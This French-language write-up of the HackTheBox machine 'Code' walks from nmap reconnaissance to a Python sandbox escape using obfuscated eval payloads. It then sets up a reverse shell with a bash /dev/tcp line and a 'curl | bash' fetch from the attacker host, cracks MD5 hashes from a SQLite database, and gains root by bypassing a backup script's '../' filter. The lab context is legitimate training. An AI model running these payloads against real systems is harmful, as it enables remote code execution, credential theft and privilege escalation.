Code HackTheBox (WriteUp)

Skills:

SSTI Exploit – Python Code Editor
SQLite Database Extraction & Hash Cracking
backy.sh Bypass via Path Manipulation [Privilege Escalation]
Tar Archive Extraction from Root Directory

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.62 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (22,5000)

nmap -sCV -p22,5000 10.10.11.62 -oN targeted

Exploitation SSTI – Python Code Editor

Un éditeur de code Python est découvert sur le port 5000. Lors de tentatives d’injection classiques (import os, exec, etc.), des erreurs sont générées.

Pour contourner les restrictions, on utilise une boucle pour identifier une classe permettant l'accès aux fonctions intégrées (__builtins__) :

for i in range(500):
    try:
        x = ''.__class__.__bases__[0].__subclasses__()[i].__init__.__globals__['__buil'+'tins__']
        if 'ev'+'al' in x:
            print(i)
    except Exception as e:
        continue

Cette boucle Python tente d'exploiter une injection de template côté serveur (SSTI) en cherchant parmi les sous-classes des objets de base de Python (object) une qui donne accès à l’environnement global (__globals__) de sa méthode __init__. À chaque itération, elle tente de récupérer le dictionnaire des fonctions intégrées (__builtins__) en reconstruisant son nom pour éviter d’être détecté facilement. Si l’objet obtenu contient la fonction eval (très dangereuse car elle permet d’exécuter du code arbitraire), alors l’indice de la classe est affiché. Ce code est souvent utilisé pour localiser une classe qui permet d’accéder à des fonctions critiques comme eval, exec, open, etc., dans le but d’en abuser.

Lecture de `/etc/passwd`

Une fois l’objet contenant eval identifié, nous exécutons :

print(''.__class__.__bases__[0].__subclasses__()[80].__init__.__globals__['__buil'+'tins__']['ev'+'al']('__imp'+'ort__("o'+'s").po'+'pen("cat /etc/passwd").re'+'ad()'))

Cela révèle deux utilisateurs : martin et production.

Reverse Shell

Mise en écoute sur le port 443 :

nc -nvlp 443

Script de reverse shell :

Création d’un fichier index.html contenant :

#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.90/443 0>&1

Lancement d’un serveur web :

python3 -m http.server 80

Injection du payload :

print(''.__class__.__bases__[0].__subclasses__()[80].__init__.__globals__['__buil'+'tins__']['ev'+'al']('__imp'+'ort__("o'+'s").po'+'pen("curl http://10.10.14.90 | bash").re'+'ad()'))

Traitement du terminal :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Flag user.txt :)

Élévation de privilèges

Accès SSH avec l'utilisateur `martin`

Nous découvrons un fichier database.db. Une inspection via SQLite nous révèle deux utilisateurs (development, martin) avec des hashs de mots de passe.

sqlite3 database.db

Users

hashs

development

759b74ce43947f5f4c91aeddc3e5bad3

martin

3de6f30c4a09c27fc71932bfc68474be

Crack des mots de passe avec CrackStation, puis connexion :

CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.crackstation.net

Users

hashs

development

martin

nafeelswordsmaster

ssh [email protected]

Sudo - backy.sh (script)

Nous apprenons que martin peut exécuter /usr/bin/backy.sh en tant que root.

sudo -l

Le script vérifie :

Que le fichier JSON donné existe,
Que chaque chemin dans directories_to_archive est sous /var/ ou /home/,
Supprime les séquences ../ via jq.

#!/bin/bash

if [[ $# -ne 1 ]]; then
    /usr/bin/echo "Usage: $0 <task.json>"
    exit 1
fi

json_file="$1"

if [[ ! -f "$json_file" ]]; then
    /usr/bin/echo "Error: File '$json_file' not found."
    exit 1
fi

allowed_paths=("/var/" "/home/")

updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\\.\\./"; ""))' "$json_file")

/usr/bin/echo "$updated_json" > "$json_file"

directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')

is_allowed_path() {
    local path="$1"
    for allowed_path in "${allowed_paths[@]}"; do
        if [[ "$path" == $allowed_path* ]]; then
            return 0
        fi
    done
    return 1
}

for dir in $directories_to_archive; do
    if ! is_allowed_path "$dir"; then
        /usr/bin/echo "Error: $dir is not allowed. Only directories under /var/ and /home/ are allowed."
        exit 1
    fi
done

/usr/bin/backy "$json_file"

Contournement :

On configure un fichier pwned.json :

{
  "directories_to_archive": [
    "/home/....//....//./root/"
  ],
  "destination": "/home/martin/pwned"
}

Exécution :

sudo /usr/bin/backy.sh pwned.json

Décompression :

tar -xf code_home_.._.._._root_2025_April.tar.bz2

Flag root.txt :)

Mis à jour il y a 7 mois

Ce contenu vous a-t-il été utile ?